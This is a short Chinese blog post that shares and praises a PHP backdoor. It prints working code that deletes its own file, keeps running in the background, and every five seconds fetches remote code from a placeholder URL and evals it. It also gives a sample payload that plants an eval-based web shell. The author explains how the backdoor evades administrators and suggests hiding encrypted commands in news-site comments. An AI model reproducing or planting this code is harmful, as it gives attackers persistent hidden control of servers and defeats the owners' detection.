撿了一個非常淫蕩的PHP後門,給跪了
阿新 • • 發佈:2019-01-06
<?php unlink($_SERVER['SCRIPT_FILENAME']); ignore_user_abort(true); set_time_limit(0); $remote_file = 'http://xxx/xxx.txt'; while($code = file_get_contents($remote_file)){ @eval($code); sleep(5); }; ?> |
後門的程式碼第一行刪除自身,然後駐留在後臺記憶體裡(關於ignore_user_abort函式,百度一下),等待外部連結
在xxx.txt中寫入你的後門程式碼,訪問後就會刪除自己並迴圈執行txt的程式碼 例如txt裡面寫了一句這樣的程式碼 file_put_contents('./1.php',"<?php @eval($_POST[cmd])'"?>");
這樣就會在目錄下又生成一個木馬
如果對方寫了是執行命令 。。。
這段程式碼純粹變成了一個等待命令的木馬。。
而且管理員檢查木馬檔案的時候 都找不到。。。
因為檔案已經刪除了
木馬卻注入在php-fpm內
sleep(5); 五秒就去遠端讀取一下指令。。。........打算將程式碼修改一下,加一些正則,去163某一篇新聞的評論裡讀取預先設定的惡意程式碼。。。hehe。。。
黑客連伺服器都省了。。。
黑客只需要去網易新聞評論視窗內寫入自己的程式碼就行 怕別人看懂?直接加密
採用對稱加密演算法。。沒有祕鑰 誰也看不懂啥意思
祕鑰在這段後門裡面寫著
所以非常安全
活生生就是一個遠控木馬啊!!
這麼好的思路,給作者一個大讚